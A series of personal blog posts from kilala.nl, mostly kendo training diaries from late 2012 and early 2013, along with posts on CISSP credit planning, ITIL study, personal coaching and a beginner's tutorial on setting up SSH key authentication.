SEME (攻め) in BUDO (武道) is usually used to indicate the initiative to close the distance and maintain the pressure when launching an attack. This can be part of a very decisive and even explosive technique or in combination with TAME (溜め), where pressure is build in a more gradual way and where the final target depends on the reaction of that opponent.

Tame comes from the verb tameru, meaning “to amass” or “to accumulate”. In this case we are creating seme and then gathering more and more tension. For this particular session, Fukuyama-sensei described our exercise as follows:

  1. Assume issoku itto kamae.
  2. Generate seme.
  3. Inhale deeply and kakegoe (*) strongly.
  4. Do NOT inhale, do NOT exhale further.
  5. Hold your breath for five seconds.
  6. Attack at your fiercest, with a very strong kiai.

Fukuyama-sensei explained that, in this exercise, holding your breath will help you retain focus on your opponent and on seme. This way you are deeply invested in your attack, almost guaranteeing a beautiful strike. He compared it to a story he once heard about olympic sprinters, who would finish their 100m dash without breathing to retain 100% focus.

We practiced seme to tame to butsu with different kihon and waza: first with chisai men, kote and dou, then in oji waza where motodachi would attack with chisai men. As usual we were told to do our very best attack, because otherwise the exercise would be useless.

Before moving on to jigeiko, we practiced the various hiki waza: men, kote and dou. These exercises were combined with the previous tame exercises. When it came to hiki dou, Fukuyama-sensei explained that moving backwards can be done in three directions.

  1. To the left is sub-optimal, as it makes it hard to properly strike and follow through.
  2. Straight, where you remain on the center line of your opponent.
  3. To the right, making for an easier strike while also putting you off the opponent’s center.

For showing zanshin after hiki dou, Fukuyama-sensei said that you should relax after striking. Your arms should not be tense and your shinai should not be immovable. Instead, follow through downwards in the natural arc of your strike and relax your arms (so you are also ready for a counter attack).

*: For extensive information on kakegoe, what you could call the “kiai in kamae”, please refer to chapter 13 of Noma Hisashi-sensei’s ‘Kendo Reader’.


kilala.nl tags: , ,

View or add comments (curr. 0)

Preparing for my exams

2013-01-20 09:37:00

2013 will be a year of exam preparation for me. Not only at work (ITILv3, RHCSA, maintaining my CISSP), but also in kendo. 

Last year I decided that I want to take my ikkyu exam this summer, ikkyu being the first grade that is tested on a national level. I wrote the shinsa prep guide for the RSJ website and based on my research, I will need to do the following for my ikkyu exam:

In the first three tests, kiai is highly important at the ikkyu level, so I'll definitely give that my best!

The NKR exam is still a few months away, so I'm very happy that I'll be getting an extra exam in between. A month ago Ton-sensei announced that Renshinjuku Almere would be holding their local kyu-grade shinsa on 25/01, which is next week. I've asked Ton-sensei and Hillen- and Kris-fukushou to keep in mind my aspiration of testing for ikkyu. For our own exams this means that I'm asking them to allow me to skip a grade and to test for nikyu instead of sankyu, while at the same time asking them to judge me at ikkyu level. That's a bit of a leap (I last tested for yonkyu a year ago), but they appear very willing to help me out for which I am very grateful. 

To do list before next week:


kilala.nl tags: , ,

View or add comments (curr. 2)

Taught kendo for the first time

2013-01-20 08:43:00

Ahhh, life :) I've just gone over the last weeks' worth of blog posts from when I was still in college, working on getting my teaching degree. On the one hand I love reading about that time, on the other it makes me a bit sad because it's all done and gone. There's that 'mono no aware' again: the beauty of passing/fading. One thing that has never left me though, is the fact that I love to teach. 

That's why I was thrilled when Ton-sensei asked me to teach the beginners group for a part of class. :)

After warming up and doing footwork practice (laps of okuri ashi, lunges and fumikomi), my sempai suited up for kihon and waza practice (suriage-men, ai-men etc) and I took the group of a dozen newbies. Because I hadn't prepared anything beforehand and because Ton-sensei didn't have any specifics he wanted me to teach, I went through the following thought process.

Putting all of that together, I decided to work on ki-ken-tai-ichi: the unity of mind, sword and body during a strike. This builds upon what we've done so far and is something that the group could use in kihon practice with Jeroen. These are the drills I went through with them:

In each of these practices, I first let the group do them a number of times without me saying anything. Five men strikes, twenty haya-suburi, two laps of okuri-ashi, etc. I only observed them, trying to see what everyone is doing. After the initial round, I would provide general feedback without singling anyone out. Then I'd let them repeat the exercise again, doubling the amount of strikes/laps. During this second round I would provide the students with personal feedback.

I'm very glad that the group paid full attention! At no point in time did they start drifting away or slacking off, which, I hope, was due to my demeanor and posture: stern and polite, speaking clearly and loudly and giving precise instructions. Once again my strong lungs came in handy, as I was able to address the group as they lined up (no huddle needed) while still being heard over the loud group in bogu.

I certainly hope to teach again sometime soon :)


kilala.nl tags: , , ,

View or add comments (curr. 2)

ITILv3: bone dry material

2013-01-13 20:31:00

Dry dry dry

*cough**hack* Someone get me a glass of water! 

After getting some quick credits out of the way for my CISSP certification, I'm now moving on to ITILv3 Foundations, all according to plan. But boy, oh boy, is that some dry reading material! When I first took my ITILv2 exam in 2001, it took some slogging and then I made the certification in one go. So technically you would expect me to get through this renewal easily. Well, I'm working through this particular book and it's drrryyyyyyyyaaaaihhh. A veritable deluge... no, that implies "wet"... A veritable landslide of management terms and words, rammed into short definitions, makes for something I have trouble getting through. 

Maybe I'd better get another book :)

Pictures not mine, sources A and B.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Coaching: better than I expected

2013-01-12 13:45:00

Quite a while ago my dear friend Menno started a career in personal coaching. He's still a civil engineer, but as a side business he runs Rockover Coaching which is based on the co-active coaching formula. It took a lot of hard work, but he's now ready to start working with clients. As part of his startup year, he asked me whether I'd like to be a 'victim' and I gladly accepted. I may have an ingrained mistrust of coaches, but I know I can trust the guy who's been my best friend for 27 years ;)

Over the past few weeks we've used a lot of different techniques to explore various topics, such as:

So... After almost three months of weekly coaching I have to say it's a lot more fun and interesting than I thought before starting with Menno. I had a few other touchy-feely courses (through work) before this, but none of those were as comfortable as this.


kilala.nl tags: , , ,

View or add comments (curr. 1)

Not much to say: it was good

2013-01-12 13:33:00

There's not much to say about today's training as it simply was a good, solid training. 

1.5 years ago I wrote about a kendo dummy that I would love to build. Lo and behold! Ton-sensei has built two for the dojo: one child-sized and one adult-sized. They look cool and after tweaking them a bit, many of our beginners were very happy to use them in training. 

After inspecting the dojo shinai I proceeded to go through kata #1-#4 with Hugo. Since he told me he was pretty rusty (he's often absent because of school) I took a firm lead and escorted him through the first three, correcting where needed. When we got to #4, I'm glad that Ton-sensei corrected a number of things I was doing wrong (most importantly, stabbing too high and at a wrong angle).

During footwork practice I was reminded yet again that I have trouble combining okuri ashi with fumikomi: whenever I need to jump while going forward, I always overstep with the left foot before the jump. The timing is completely off: instead of jumping right after pulling the left leg in, my body tries to jump after the right foot has gone forward again. It's crappy.

Kihon and waza practice went pretty well, but it was jigeiko that stood out for me today :)


kilala.nl tags: , ,

View or add comments (curr. 0)

A great session in Amstelveen

2013-01-09 08:50:00

I'm not entirely sure what happened, but last sunday's Central Training did wonders for my confidence. Last night was the first time I can recall that I went to Amstelveen without feeling nervous. I was aching to practice with my sempai and I'd prepared to answer any questions I might get about what we learned during the CT.

I reckon that attending the CT was a good step in my continued 'exposure', trying to alleviate my anxiety issues. The CT was outside my comfort zone and because it went so well, it seems my boundaries have shifted a bit. Nice!

Class was started, as has become custom, with half an hour of kata training. I again partnered with Nienke and we did many repeats of kata #1 (and a bit of #2 and #3). Why focus so much on kata #1? Because of some contention we ran into! I'd been taught by Ton-sensei and Kris-fukushou that after being struck by shidachi (and after letting the bokken sink to eye level), uchidachi would be "pushed back" by shidachi. Shidachi would "threaten you away". Instead, Kiwa-sempai and Ran-sempai informed us that "uchidachi always moves first", so the new analogy would be that uchidachi attempts to flee, with shidachi preventing this by assuming a threatening pose. Interesting!

After kata a shinai check was performed, which has also become customary. I heard that last Saturday ~70% of the students' shinai were rejected during the check, leading to an impromptu lesson in maintenance. Hence Renshinjuku kendo dojo have instated the rule that, if your shinai is rejected, you will now spend the training repairing the big collection of dojo-shinai. Both of my shinai were in an "okay" state, though not very good. After tightening the tsuru of my second one, I was allowed to join class. So, time for another evening filled with maintenance!

After warming up, we moved to waza practice. A few rounds of kirikaeshi variations, followed by oki-men, oki-kote, hiki-waza from tsubazeriai and men-oji-waza. There wasn't any explanation of techniques, just the chance to practice a lot.

I had jigeiko with Onno-sempai, (I think) Tsuyuguchi-sensei and with Raoul-sempai.


kilala.nl tags: , ,

View or add comments (curr. 0)

Intensive kendo training: "central training"

2013-01-06 19:08:00

Almost a year ago I visited the Landstede sport center in Zwolle, to participate in the NK kyu-graded kendo. Today, we made the trek to attend the first 'central training' of the year. It's "central" insofar that it's a large kendo training, for all dojo in the Netherlands. Marli took my daughter for a fun-filled morning at Ballorig in Hattem, while Jeroen-sempai, Nienke and myself went to the training. Marli 'sacrificed' her usual day off, so I could have a great training day.

And great it was! Today's practice pulled in about 50 people (est. 15 beginners, 15 kyu-graded and 20 dan-graded), with four high-placed sensei and our honored chairman Odinot taking the lead. Today's agenda was as follows:

  1. 25 minutes of joint kihon practice of hayai-techniques. Also, ki-ken-tai-ichi exercises.
  2. 80 minutes of waza practice under Vitalis-sensei, while Wouters-sempai instructed the beginners.
  3. 20 minutes break/lunch.
  4. 60 minutes of jigeiko.

Under Vitalis-sensei, the group was split into mudansha and kodansha so everyone got from practice what they needed. We practiced the following techniques, some of which were new for many of us. Each technique was practiced 2x2 times, after which shugou was called in order to learn the next one. 

 

I got a chance to have jigeiko with three of the leading sensei

  1. I didn't receive any specific feedback from Barbier-sensei. I tried to use a few of the techniques we learned, combined with some of the stuff Heeren-sensei taught us. After a few minutes, Barbier-sensei asked me to do a round of kirikaeshi.
  2. I very much enjoyed my round with Castelli-sensei, who has a very enthusiastic and energizing personality. She let me try a few techniques, then took me aside to tell me (paraphrased): "You need to want your target. I see you hitting air, making a lot of movement, but never getting to where you want to go. I see you go for men, but you don't get to my men. I see you go for kote, then don't hit kote. You need to WANT to hit. You need to WANT to put your shinai on my head! Be hungry! You need to be like an animal of prey". And yeah, that was a very interesting realization for me! I hadn't thought of it like that, but she's right! The next few attacks I was a lot more focused, after which she took me aside again. "The Japanese say: ichi gan, the eyes are first. I see you very often not looking at your target. You strike my kote, but look somewhere completely else! Don't! Eyes on the target!".
  3. Right before the closing kirikaeshi, I had a very short round with Vitalis-sensei. At first I had offered to cede my position to mrs De Jong who outranks me, but Vitalis-sensei said I shouldn't do that. "I don't care if they're 10th dan! In kendo you need to be hungry and egotistical to get the training you want. You need to be fast in dressing, first in line and scramble for practice with the teachers you want!" Based on the few strikes I made for him, he also warned me that right now I shouldn't yet be trying "patient"/"waiting" kendo. "Make attacks! Make plenty of attacks! Right now you still have plenty of time to make plenty of mistakes. If two out of ten strikes land relatively close, that's great!" Which certainly sounds a lot like what Kris-fukushou keeps telling me: I wait too much.

During closing, Vitalis-sensei shared the following remarks.

After the training we quickly visited Kaijuu and Natalie and then headed home. Nienke and Jeroen were dropped off at the station again, after which the three of us went for dinner at Tang Dynastie. Great food, as always. All of us exhausted, our kid quickly fell asleep at 1900 and now it's off to bed for us as well :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Well, that wasn't good

2013-01-05 15:02:00

Wow, I can tell that I haven't done any kendo the past three weeks :(

Today's practice went pretty badly for me, because I'm -already- out of shape! Three weeks of no sports is killer, after a few months of only two kendo practices each week. I really need that third session at home to keep up. I'm sad to say I had to bow out from the bogu-group twenty minutes before the end of class.

I got some very important feedback from Ton-sensei: my hayai-men is still almost as bad as a year ago. I still make the same damn mistakes as before, where I pull back large and only stretch forward when striking instead of stretching forward and then striking with a tiny movement. 1.5 years later I am still making the wrong movements. 

Also, whatever progress I had made with my breathing is now gone again. It was crap today and was the biggest cause of my early drop-out.

The second pointer I got from Ton-sensei is that I'm cueing my attacks. We already knew that, but I didn't know -this- particular cue! The Miyaharas and Zicarlo-sempai all told me about my footwork issues, right before launching an attack. But Ton-sensei also pointed out that I dip my shinai before swinging upwards. 

So, my training goals for this year: get a decent hayai-men, control my breathing, and less cueing before a strike.


kilala.nl tags: , ,

View or add comments (curr. 1)

Study plan for 2013: continued education

2012-12-21 06:03:00

Because I like to keep work and my private life very much separated, I usually try to do as little IT stuff at home as possible. "Work is work, home is home", I often say and so far it's made for a pleasant balance between the two where I don't take home too much stress. But, as much as I dislike it, being in the IT workforce means there is a very real need for continued education. So every once in a while I will do a huge burst of studying in one go, to achieve a specific goal or two. Case in point: 2010's CISSP certification.

However, said CISSP certification means that I will now need to start using a different approach in my continued education. I can no longer work with infrequent bursts, as I need to obtain a certain amount of CPE credits every year. Which is why I broke out the proverbial calculator and did some math to determine what I should do on an annual basis to retain my CISSP. Instead of huge bursts of work, I will now be spreading out my studies.

Which is why I made the following plan for my 2012/2013 studies.

 

Again, with many thanks to my colleague Rob for making the final needed suggestion to get me to sort out the CPE calculation. And to my coach for being my sparring partner in all of this.

 


kilala.nl tags: , ,

View or add comments (curr. 0)

SSH keys for dummies: how to set up ssh_pk authentication

2012-12-20 21:18:00

How to set up SSH keys in three easy steps

Creating and configuring SSH key authentication can be a complicated matter. Ask any techie, including myself, about the process and you are likely to get a very longwinded and technical explanation. I will in fact provide that exhaustive story below, but here's the short version, where you set up SSH key authentication in three easy steps.

 

Quickly setting up SSH key authentication

Generate a new key pair using...

ssh-keygen -t rsa

...and just press Return on all questions.
Install the "lock" on your door using...

ssh-copy-id -i ~/.ssh/id_rsa.pub $host

...where $host is your target system. Or, if ssh-copy-id is not available, copy these instructions.
You're done! Start enjoying your SSH connection!

ssh $host

 

Please feel free to print the poster of this three-step approach, just to make sure you don't forget them.


 

What is SSH anyway?

SSH, short for Secure SHell, is an encrypted communications protocol used between two computers. Both the login process as well as the actual data interchange are fully encrypted, ensuring that prying eyes don't get to see anything you are working on. It also becomes a lot harder to steal a user account, because simply grabbing the password as it passes over the network becomes nigh impossible.

The name, secure shell, hides the true potential of the SSH protocol as it allows for many more functions. Among others, SSH offers a secure alternative to old-fashioned (and unencrypted) protocols such as Telnet and FTP. It offers:

SSH is cross-platform, insofar that both server and client software is available for many different operating systems. Traditionally it is used to connect from any OS to a Unix/Linux server, but SSH servers now also exist for Microsoft Windows and other platforms.

SSH is capable of using many different authentication and authorization methods, depending on both the version of SSH that is being used and on the various provisions made by the host OS (such as PAM on a Unix system). One is not tied to using usernames and passwords, with certificates, smartcards, "SSH keys" (what this whole page is about) and other options also being available.

Unfortunately, its flexibility and its many (configuration) options can make using SSH seem like a very daunting task.

 

What are SSH keys?

The default authentication method for SSH is the familiar pair of username and password. Upon initiating an SSH session you are asked to provide your username first, then your password, after which SSH will verify the combination against what the operating system knows. If it's a match, you're allowed to log in. If not, you're given another chance or so and ultimately disconnected from the system. However, the need to enter two values manually is a burden when trying to automate various processes. It often leads to hackneyed solutions where usernames and passwords are stored in plaintext configuration files, which really defeats the purpose of using such a secure protocol.

SSH keys provide an alternative method of authenticating yourself upon login. Taken literally, an SSH keypair is a pair of ASCII files, each containing a long string of seemingly random characters and numbers. These keys are nearly impossible to fake and they only work in pairs; one does not work without the other. The reason why SSH key authentication works is that what is encrypted using one key can only be decrypted using the other key. And vice versa. This is the principle behind what is known as public key cryptography.

Public key encryption, and thus SSH key authentication, is a horribly complex technical matter. I find that for most beginners it's best to use an analogy.

A keypair consists of two keys: the public and the private key. The public key could be said to be a lock that you install on an account/server, while the private key is the key to fit that lock. The key will fit no other lock in the world, and no other key will fit this particular lock.

Because of this, the private key must be closely guarded, protected at all cost. Only the true owner of the private key should have access to it. This private key file can be protected using a password of its own (to be entered whenever someone would like to use the key file), but it is often not. Unfortunately this means that, should someone get their hands on the private key file, the target account/host becomes forfeit. Thus it's better to use a password protected keyfile in combination with SSH-agent. But that's maybe a bit too advanced for now :)
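For the curious, here is a minimal sketch of that agent setup, assuming an OpenSSH client with ssh-agent available and a passphrase-protected key stored at ~/.ssh/id_rsa:

==============================================================

# Start an agent for this shell session and load the environment variables it prints:
eval "$(ssh-agent -s)"

# Add the passphrase-protected private key; you type the passphrase only once:
ssh-add ~/.ssh/id_rsa

# From here on, logins that use this key go through the agent, without further prompts:
ssh $host

==============================================================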

The public key on the other hand can be freely copied and strewn about. It is only used to set up your access to an account/server, but not to actually provide it. The public key is used to authenticate your private key upon login: if the key fits the lock, you're in. "Losing" a public SSH key poses no security risk at all.

Of course there's one caveat: while losing a public key is not a problem, one should not simply add public keys onto any account! Doing so would enable access to this account/server for the accompanying private key. So you should only install public keys that have good reason for accessing a specific account.

 

How does SSH key authentication work?

So how does SSH key authentication work? It all relies on a public key infrastructure feature called "signing". The exact process of SSH key authentication is described in IETF RFC 4252, but the gist of it is as follows. 

  1. The source system (your SSH client) "signs" a test message with your private key
  2. The destination system verifies that signature using the public key you installed there
  3. If the signature checks out, then we know that the pair of keys match. You're allowed to log in.

As I said, this only works because the public and private key have an unbreakable and inimitable bond.

All of the following text assumes that you already HAVE a ready-to-use SSH keypair. That's the first step in the three-step poster shown at the top of this page. Generating a keypair is done using the ssh-keygen command, which needs to be run as the account that will be using the keys. Basically: ssh-keygen -t rsa is all you need to run to generate the keypair. It will ask you for a passphrase (which can be left empty). 
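As an illustration of that first step, here is a sketch of generating a keypair on an OpenSSH client; the key size and the comment are just examples, not a prescription:

==============================================================

# Generate a 4096-bit RSA keypair; accept the default location and set a passphrase if you like:
ssh-keygen -t rsa -b 4096 -C "my workstation key"

# The result is a pair of files under ~/.ssh:
#   id_rsa      the private key ("the key") -- guard it closely
#   id_rsa.pub  the public key ("the lock") -- safe to hand out

==============================================================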

 

What if you don't have ssh-copy-id?

Unfortunately ssh-copy-id is not included with every SSH client, especially not if you're coming from Windows. The instructions below will only work when your source host is a Unix/Linux system, so if you're using Windows as a source you will definitely need to use the manual process. The script below also assumes that the remote host is running OpenSSH.

Copy and paste the script below into a terminal window on your source host. It will ask you to enter your password on the remote host once.

==============================================================

echo "Which host do we need to install the public key on?"
read HOST
ssh -q $HOST "umask 077; mkdir -p ~/.ssh; echo "$(cat ~/.ssh/id_rsa.pub)" >> ~/.ssh/authorized_keys"

==============================================================

This could fail if the public key file is named differently. It could be id_dsa.pub instead, or something completely different if you are running a non-vanilla setup. 


Setting up SSH keys the hard way

So, finally the hardest part of it all: getting SSH keys to work, without the use of ssh-copy-id or any other handy-dandy tooling. 

First up, there is the nasty fact that not all SSH clients and daemons were created equal. There are different standards that they can adhere to when it comes to key file types as well as the locations thereof. Because Linux and open source software have become so widespread, OpenSSH has become very popular as both client and server. But you'll also see F-Secure, Putty, Comforte, and a whole wad of others out there. 

To find out which Unix SSH client you're running, type: ssh -V

For example:

$ ssh -V
ssh: F-Secure SSH 5.0.3 on powerpc-ibm-aix5.3.0.0


$ ssh -V
OpenSSH_4.3p2, OpenSSL 0.9.8j 07 Jan 2009

OpenSSH

F-Secure

Putty and WinSCP

When you are going to be communicating from one type of host to another (SSH2 vs OpenSSH), you will need to perform key file conversion using the ssh-keygen command. The following assumes that you are running the command on an OpenSSH host.
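As a sketch of such a conversion with OpenSSH's ssh-keygen (the file names here are only examples):

==============================================================

# Export an OpenSSH public key to the SSH2 / RFC 4716 format used by commercial SSH2 software:
ssh-keygen -e -f ~/.ssh/id_rsa.pub > ~/id_rsa_ssh2.pub

# Import an SSH2-formatted public key into the OpenSSH format:
ssh-keygen -i -f ~/otherhost_ssh2.pub >> ~/.ssh/authorized_keys

==============================================================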

Key points to remember

Always make sure you are clear:

File permissions
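OpenSSH is picky here: with StrictModes enabled (the default) sshd checks the ownership and modes of your home directory, ~/.ssh and authorized_keys, and it will reject key-based logins when those are too permissive. A rule-of-thumb sketch:

==============================================================

# On the target host: only the owner may touch ~/.ssh and the authorized_keys file.
chmod 700 ~/.ssh
chmod 600 ~/.ssh/authorized_keys

# On the source host: the private key must be readable by you alone.
chmod 600 ~/.ssh/id_rsa

==============================================================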


kilala.nl tags: , ,

View or add comments (curr. 1)

A class out of the ordinary

2012-12-19 15:33:00

 

Pfff... You would think that after nearly a year of training with my sempai in Amstelveen, I wouldn't be anxious anymore. But I am. :)

They're great people, but I always dread acting like a complete newbie around them. That and I fear that I'm not pulling my weight. Well, nothing to do but push on! Maybe this will be a nice subject for my next coaching session

Last night was a training out of the ordinary. Seeing how it was the last tuesday-night session for 2012, the turnout was smaller, with only one sensei appearing and the group totaling roughly fifteen people (nine in bogu). While Roelof-sensei kept an eye on everyone for details, Kiwa-sempai led the advanced group in what I found to be a tremendously educational class. 

The first half hour of class was spent on practicing kendo kata. I finally got a chance to practice with Nienke, a classmate whom I appreciate and with whom I'm on-par. We went through kata #1 through #3 and focused greatly on practicing #3. A lot of things that I thought I was doing right, I turned out to be doing slightly wrong or I just learned them a bit differently. Under the watchful eye of Onno-sempai, Roelof-sensei and Kiwa-sempai I got a lot of pointers.

The next half hour was spent on learning the bokuto ni yoru kendo kihon waza keikoho, also known as the kihon bokuto waza. This set of exercises is relatively new and targeted mostly at beginning students and lower-ranked kendoka. Here, one practices the various techniques in kendo in a more realistic as well as entry-level setting: unarmoured and with a bokuto, which is shorter than a shinai. Much more information can be read in this excellent PDF. In class we practiced kata #1 through #3, which are:

  1. The four basic targets: men, kote, dou and tsuki.
  2. A successive kote-men.
  3. The harai-men technique.

Despite seemingly being a lot easier than normal kata, I had a surprising amount of trouble getting the motodachi role right. And, as I have with the normal kata, at first I held back when striking at Nienke for fear of actually hitting her. In this regard, I overheard a very important comment from Kiwa-sempai who said to strike without power, but in a relaxed fashion. 

The last half hour was dedicated to jigeiko. The beginners' group joined Roelof-sensei for kihon practice, while the advanced group went through their desired routines. While most duos did actual sparring, I was very grateful for Zicarlo-sempai's help in practicing kirikaeshi. As expected I soon got winded, because I'm still messing up my breathing :) It was great practice though and I need a lot more of it, if I want to test for ikkyu this summer. 

The biggest failings I showed today were my over-use of my right hand, which led to hitting way too hard. Also, I was cueing, as Zicarlo said, because I kept fiddling with my footing. Every single time, before pushing off on the left foot, I would re-set my left foot one last time. This is in part due to my under-estimating the reach of my shinai: I keep fearing that I cannot reach my target.


kilala.nl tags: , ,

View or add comments (curr. 0)

Muscle ache? Check!

2012-12-16 08:57:00

kendo notes

Between my sterilization, the Dinosaurs show, standby duties and Alegria I've been absent from kendo class for two full weeks. And because I've been so busy with work I haven't practiced at home either. I feel guilty about it, but as they say: "god's punishment is swift" because boy do my muscles hurt! (;^_^)

It's great to see how our group keeps growing with newbies, who also show great attendance. Sadly, we don't seem to have much luck with the guys in bogu though. Sander is very busy with work, Hugo has a lot of schoolwork as do Jeroen, Martijn and Houdaifa and I myself have family and work stuff. So that's six guys who should be senior in the group, but who have problems making attendance. On the one hand it's beneficial to the friendly atmosphere in our dojo that Ton-sensei is so lenient about attendance, but on the other hand our attendance issues do keep both ourselves and our juniors from learning as quickly as we could. 

When it comes to our members, it's also interesting to see how many young kids we attract. We don't yet rival our mother-dojo in Amstelveen (who have flocks of Japanese children attending training on saturday), but I'm willing to bet that we're in the top four for the number of kids. Bobby doesn't count anymore as she started high school this year, but between Aaron, Ainar, Nathan, Lukas and the Korean-boy-whose-name-I-haven't-learned-yet we have five students of ten or younger.

Now, on to class. After warming-up we started with lunges in order to improve footwork and balance. I don't keel over anymore, but that's because I'm over-compensating. There are two commonly made mistakes: either you keep a too-narrow stance and can't keep your balance, or you over-compensate for that and take a too-wide stance (as per graphic A above). Kris-fukushou reminds us that we really should keep our feet at the proper width during the whole practice. 

We practiced kihon in the motodachi system, with the eight guys in bogu acting as partner for the dozen or so people without bogu. After that the group was split up as usual and my group moved on to waza practice. The two most important lessons for myself were about debana kote and suriage men

With debana kote I was always confused: do I need to move my shinai over or under my opponent's blade? Turns out that it's neither, because both are too slow :) As per graphic B, Kris explained that your shinai stays almost level, while the opponent moves in for a men-strike. That way you automatically duck under his shinai and you also stay close enough for a quick kote strike. 

Now, suriage men is apparently a very difficult technique for kyu-grade students, but it doesn't hurt to get introduced. Kris-fukushou suggested the D/C-shaped movement that is also mentioned by Salmon-sensei in the linked article. And as Salmon-sensei points out, most of us were having lots of issues with both the movements and the timing. In my case I feel way too slow and I have it in my mind that suriage men is a two-stage movement, while it should be more of a single arc where you deflect and strike from the deflect position. 

Aside from these things, Kris-fukushou warned me about my kiai and kamae. I think it may tie in with a warning Onno-sempai gave me a few weeks ago. If I do my kiai incorrectly, I hunch and lock my arms. There's a big difference between a relaxed posture and an "open" "YIAAAAAA!" yell and a tight/locked posture with a "closed" "RRUAAAGH!" yell. Once I'm locked up, I can't strike quickly or properly. 

Class was closed with all students in bogu acting as motodachi in uchikomi geiko, which the other students had to run twice. That meant a total of fourteen rounds of five strikes for everyone. A great way to close this last class of the year!


kilala.nl tags: , ,

View or add comments (curr. 0)

Confessions of a CISSP slacker

2012-12-09 10:30:00

And to think... At the end of 2010 I was ecstatic about achieving CISSP status, after weeks of studying and after a huge exam. I loved the studying and the pressure and of course the fact that I managed to snag a prestigious certificate on my first attempt.

Well, the graphic on the left is a variation of my celebratory image of the time. I'm sad to say that I've been slacking off for the past two years, only doing the bare essentials to retain said title. Why? My colleague Rob had it spot on: "It seems like such a huge, daunting task to maintain your CPE." But in retrospect it turns out that he's also right insofar that "it really isn't that much work!".

Let's do some math, ISC2 style!

In order to maintain your CISSP title, you need to earn a total of 120 CPE in three years' time. As an additional requirement, you must earn 20 CPE every single year, meaning that you can't cram all 120 credits into one year. To confuse things a little, ISC2 refer to group A and group B CPE (which basically differentiates between security work and other work). 

Now, let's grab a few easily achieved tasks that can quickly earn at least the minimum required CPE.

That right there is 27 CPE per year, all in group A, which meets the required minimum. It's also 81 CPE out of the required 120 CPE for our three-year term.

Of the 120 hours, a total of 40 can be achieved through group B, which involves studying other subjects besides IT security. In my case, the most obvious solution for this is self-study or classroom education on Unix-related subjects. In the next few months I will be studying for my RHCSA certification (and possibly my SCSA re-certification), which will easily get me the allowed 40 hours. 

That means I only need to achieve 120 - (81+40) = -1 more CPE through alternative ways :) Additional CPE can be achieved through podcasts, webcasts or by visiting trade shows and seminars. One awesomely easy and interesting option is the ISC2 web seminars, which can be followed both in realtime and as recordings.
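For the spreadsheet-averse, the whole tally can be sketched in a few lines of shell, using the numbers from this post (the 27 is my own estimate of easily earned annual group A credits):

==============================================================

# Three-year CISSP CPE tally, using the figures above.
GROUP_A=$(( 27 * 3 ))    # easily earned group A credits over three years: 81
GROUP_B=40               # maximum number of creditable group B hours
echo "Total: $(( GROUP_A + GROUP_B )) of the required 120 CPE"    # prints 121

==============================================================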

Now, because I've been slacking off the past two years, I will need to be smart about my studies and the registration thereof. I'm putting together a planning to both maintain my CISSP and to prepare for my RHCSA. 

It's time to get serious. Again. ;)

EDIT:

It looks like it's a good idea to also renew my ITIL foundations certification. If I'm not mistaken, that can be counted towards group A of CPE, as ITIL is used in domains pertaining to life cycle management, to business continuity and to daily operations. I'll need to ask ISC2 to be sure.

Also, many thanks to Jeff Parker for writing a very useful article, pertaining specifically to my plight.


kilala.nl tags: , ,

View or add comments (curr. 1)

Slowly moving into a more senior role

2012-11-25 08:55:00

Yesterday was an interesting experience! As I remarked to Nick-sempai: "Whoa, I've never sat this far right in shoukai (詳解)! What a different view!" Because Renshinjuku Almere is still a relatively new dojo, with a slow growth and retention rate, I'm already moving further towards the right of the shimoza (student seating). This is only in part due to my personal progress, but mostly due to the skewed balance between beginners and kendoka in bogu. While I am aware that I'm making good progress towards my first real grading I won't delude myself into thinking I'm getting good at kendo ;)

So what was so interesting about yesterday? That skewed balance and its results! For example, yesterday we had six guys in bogu (incl Ton-sensei) and twelve beginners in uniform or normal sports gear. That's why we ran class using the motodachi system, where groups of beginners line up to train with more advanced students. Yesterday's class forced myself and the others (none of whom have a dan grade) to think and act like proper seniors to the beginners. Instead of spending class training our own kendo, we paid proper attention to theirs while providing encouragement and corrections when needed. I enjoyed it a lot and it was a great learning experience!

After kihon practice in the motodachi rotation, the beginners went with Bob-sempai to train kirikaeshi and other basic techniques. The four of us spent another half hour doing jigeiko under the watchful eye of Ton-sensei. Because Nick-sempai was preparing for today's shinsa (exams), Ton wanted us all to focus on clean and basic kendo: dou strikes wouldn't be needed, and we should cleanly break from taiatari instead of trying hiki waza.

Some pointers that I got:

Now, with regards to my own first grading I've heard a lot of different things. Originally my goal was to test in the winter of 2013, but I'm thinking of moving it forward to the summer of 2013. Some of my sempai will also be testing in the summer, so I'd love to join them.

In order to prep for the exams, I've made this shortlist of things that I must improve before the test.

  1. Kirikaeshi, coordination of hands and feet.
  2. Footwork, so no flat feet and no stepping through. 

All other things will slowly and gradually keep improving. But these two really require my attention. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Handiwork: shinai repair and modification

2012-11-23 22:59:00

Shinai and suburi shinai

Tonight was well spent :)

I managed to fix a further three shinai using the spare parts Ton-sensei left me and that Bert-sensei donated. Two shinai of the dojo and one of my own are now in tip-top shape again. As a side project I took a bunch of broken or split take and created a suburi shinai for inside the house. At 85cm it's still a bit too long (a wrong swing will hit the ceiling), but at least it's usable :)

Also, at 85cm it's much too long to be used officially as a kodachi (regulation size is 62cm), but maybe it'll be usable for some practice anyway ( ^_^)


kilala.nl tags: , ,

View or add comments (curr. 0)

Studying kata under a different teacher

2012-11-20 18:36:00

Last tuesday was an interesting class in Amstelveen: in preparation for the shinsa (kendo exams) next sunday our students were studying kata. While we study kata on a weekly basis in Almere, in Amstelveen it's a much rarer occasion. 

I was asked by Bert Niezen-sempai to join him in practicing kata. While he's more experienced in kendo than I am, he indicated that he'd like my help in kata. We learned a lot, under the watchful eye of Ran-sempai who spent the better part of 45 minutes coaching us personally. During the practice I was always uchidachi ("attacking sword"), while Bert was shidachi ("receiving sword"). He had a lot of points for improvement, the following for me.

After kata practice we immediately went into 20 minutes of jigeiko (only preceded by three rounds of kirikaeshi). I did three rounds where, sadly, I got progressively worse. My round against Zicarlo-sempai was pretty good and he helped me a lot! Against Onno-sempai I got worse insofar that I started shutting down. Finally, against Bertolino-sempai I excused myself because I noticed that I really wasn't acting properly. My head was mostly hazy and I was slow to react, or not even reacting at all. 

Learning points:


kilala.nl tags: , ,

View or add comments (curr. 0)

Studying kata

2012-11-17 22:06:00

The time has come to prepare for the 2012 NKR shinsa (kendo exams). As we already mentioned, the exam consists of four parts:

Many things have already been said about kirikaeshi and jitsugi, so let’s spend a little more time preparing for the kata exam!

Background

In his 2012 book “Kendo Coaching: tips and drills”, George McCall writes on the subject of kata:

